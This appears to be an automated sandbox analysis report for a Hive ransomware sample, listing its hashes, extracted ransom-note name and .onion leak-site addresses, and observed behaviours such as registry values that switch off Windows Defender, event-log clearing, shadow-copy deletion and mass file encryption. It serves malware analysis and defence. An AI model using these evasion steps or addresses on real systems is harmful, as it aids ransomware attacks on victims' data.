Analysis
-
max time kernel
142s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 10:02
Behavioral task
behavioral1
Sample
211xahcou.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Hive.elf
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
hive.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
hive_linux_elf
Resource
win7-20240221-en
Behavioral task
behavioral5
Sample
linux_hive.elf
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
sjl8j6ap3.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
Resource
win7-20240221-en
General
-
Target
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
-
Size
884KB
-
MD5
da13022097518d123a91a3958be326da
-
SHA1
24a71ab462594d5a159bbf176588af951aba1381
-
SHA256
25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
-
SHA512
a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
-
SSDEEP
12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Extracted
C:\Program Files\EGdu_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1640 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exepid process 960 wevtutil.exe 2344 wevtutil.exe 2488 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral7/memory/1964-0-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-1-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-2-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-1158-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-5494-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8014-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8017-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8023-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8028-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8034-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8038-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8043-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8048-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8054-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8060-0x0000000000900000-0x0000000000C12000-memory.dmp upx behavioral7/memory/1964-8084-0x0000000000900000-0x0000000000C12000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exedescription ioc process File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTtwO5MZ_CDd5vhqxbs2VkO.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL093.XML.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuSCOdwCPKG0RphOGbLwUjF8.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL095.XML.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQgzStEV85rG2_i55KsaqJQ.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCINFO.XML.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQrSJCU4D2YecTkLp_X4lcl.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\VideoLAN\VLC\plugins\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Internet Explorer\en-US\F12.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Pangnirtung.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuSnYgY11caNXGIxPkTn-YpC.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\it-IT\sbdrop.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuT6KZqiLpdiUc44EDSLSZhf.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuR1001ElAvbArVj-NHadhMm.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0297725.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQ41-dazFurPESiO22rgZxZ.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQFoQCquXnHTRSve8g-SNIY.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\SETUP.XML.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuShteM1O8_2chdYWTGUtwAR.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQy6PN1NTDzIUvDu51xetwm.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQkkoAg4-rEZ6P2a3AT_rt7.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTYrTcTmqF6Ztb-ZCusvkQH.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQIGqVekeZ8THYuSGViJkMS.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuSDDvzO2VfXP65wHLt8l9lP.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.SharePoint.BusinessData.Administration.Client.xml.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuRMtrVJtOdzCoo7gdJEk9h7.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mset7db.kic.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTtg5A5601QSgu1gdujk6oj.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\11.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTQVYWy2C1jF6Uxpe6IykB8.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01421_.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuRKlT4RQRcBLtMa9UC2DBIE.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck.css.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQQGZgnQGAZfLUgOJdDBRsA.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTMZ6XYFQu1WpK1we6r0RRG.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\gadget.xml windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuSjsOhv-t71PYDn2h-iYnUq.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Media Player\es-ES\wmpnssui.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuT3IQyzCCMkd88IkaTwUR1r.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQn46KxL5jNTZja2zM2DAYL.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQYSCUagP6LTVv1q0mSwtAA.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00735_.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTYV9wmxnP6Kpy14ytkGAQg.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_spellcheck.gif.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQmzcLTOFLHC7oNDpiSb5Qh.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR7F.GIF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuR1h34-dhF2PNvhx9bVbaNa.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTI2t1Ba6U5F6L5Vz8PPHEB.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQdP8tcObkWQuaFKWcKAkpB.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Games\Chess\es-ES\Chess.exe.mui.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuSEQZWexJ_yQZXvpxOR0Z4q.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\fr-FR\Mahjong.exe.mui.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuS4ygrq26wuVE3U5UgtPF1L.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\WMPDMCCore.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\EGdu_HOW_TO_DECRYPT.txt windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQ4TH6BUT6Mdwmb25iqOlxb.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTsK1z4Sze4dBt90-sx-kYm.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\calendar.html windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107490.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQP3LZNz7N0VDx-UeVV5dYz.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03668_.WMF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTjuUnnZWMYQDhhTg9d8q9L.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsMacroTemplate.html.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuRCMiNWoB5tFreJOCWM3Eo9.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuRjbKo81teAOFmsQvqVgdhj.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuTRy1p8_DH6ZuU8DqKiBNop.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQAj1OF1AyFMpr5UTrxVHx0.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuT0M8EDh_wUNdt35y7B-6Yy.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQMeA4DGDIpLSy7dECkIEsV.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\AD98.POC.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuQRH5Au8v9kUokSoWQbWzNP.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\logo.png windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan.OvC9P2qOUYRMCRoM61-CKpIUgR6cElBymUd_JxGXWuRPhenSMn66bvZ9KzcWMtkW.uj1ps windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1620 sc.exe 828 sc.exe 1368 sc.exe 2468 sc.exe 2440 sc.exe 1740 sc.exe 3060 sc.exe 2164 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2784 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exewindows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exepid process 2892 powershell.exe 2768 powershell.exe 1964 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 960 wevtutil.exe Token: SeBackupPrivilege 960 wevtutil.exe Token: SeSecurityPrivilege 2344 wevtutil.exe Token: SeBackupPrivilege 2344 wevtutil.exe Token: SeSecurityPrivilege 2488 wevtutil.exe Token: SeBackupPrivilege 2488 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1576 wmic.exe Token: SeSecurityPrivilege 1576 wmic.exe Token: SeTakeOwnershipPrivilege 1576 wmic.exe Token: SeLoadDriverPrivilege 1576 wmic.exe Token: SeSystemProfilePrivilege 1576 wmic.exe Token: SeSystemtimePrivilege 1576 wmic.exe Token: SeProfSingleProcessPrivilege 1576 wmic.exe Token: SeIncBasePriorityPrivilege 1576 wmic.exe Token: SeCreatePagefilePrivilege 1576 wmic.exe Token: SeBackupPrivilege 1576 wmic.exe Token: SeRestorePrivilege 1576 wmic.exe Token: SeShutdownPrivilege 1576 wmic.exe Token: SeDebugPrivilege 1576 wmic.exe Token: SeSystemEnvironmentPrivilege 1576 wmic.exe Token: SeRemoteShutdownPrivilege 1576 wmic.exe Token: SeUndockPrivilege 1576 wmic.exe Token: SeManageVolumePrivilege 1576 wmic.exe Token: 33 1576 wmic.exe Token: 34 1576 wmic.exe Token: 35 1576 wmic.exe Token: SeIncreaseQuotaPrivilege 1880 wmic.exe Token: SeSecurityPrivilege 1880 wmic.exe Token: SeTakeOwnershipPrivilege 1880 wmic.exe Token: SeLoadDriverPrivilege 1880 wmic.exe Token: SeSystemProfilePrivilege 1880 wmic.exe Token: SeSystemtimePrivilege 1880 wmic.exe Token: SeProfSingleProcessPrivilege 1880 wmic.exe Token: SeIncBasePriorityPrivilege 1880 wmic.exe Token: SeCreatePagefilePrivilege 1880 wmic.exe Token: SeBackupPrivilege 1880 wmic.exe Token: SeRestorePrivilege 1880 wmic.exe Token: SeShutdownPrivilege 1880 wmic.exe Token: SeDebugPrivilege 1880 wmic.exe Token: SeSystemEnvironmentPrivilege 1880 wmic.exe Token: SeRemoteShutdownPrivilege 1880 wmic.exe Token: SeUndockPrivilege 1880 wmic.exe Token: SeManageVolumePrivilege 1880 wmic.exe Token: 33 1880 wmic.exe Token: 34 1880 wmic.exe Token: 35 1880 wmic.exe Token: SeIncreaseQuotaPrivilege 1880 wmic.exe Token: SeSecurityPrivilege 1880 wmic.exe Token: SeTakeOwnershipPrivilege 1880 wmic.exe Token: SeLoadDriverPrivilege 1880 wmic.exe Token: SeSystemProfilePrivilege 1880 wmic.exe Token: SeSystemtimePrivilege 1880 wmic.exe Token: SeProfSingleProcessPrivilege 1880 wmic.exe Token: SeIncBasePriorityPrivilege 1880 wmic.exe Token: SeCreatePagefilePrivilege 1880 wmic.exe Token: SeBackupPrivilege 1880 wmic.exe Token: SeRestorePrivilege 1880 wmic.exe Token: SeShutdownPrivilege 1880 wmic.exe Token: SeDebugPrivilege 1880 wmic.exe Token: SeSystemEnvironmentPrivilege 1880 wmic.exe Token: SeRemoteShutdownPrivilege 1880 wmic.exe Token: SeUndockPrivilege 1880 wmic.exe Token: SeManageVolumePrivilege 1880 wmic.exe Token: 33 1880 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
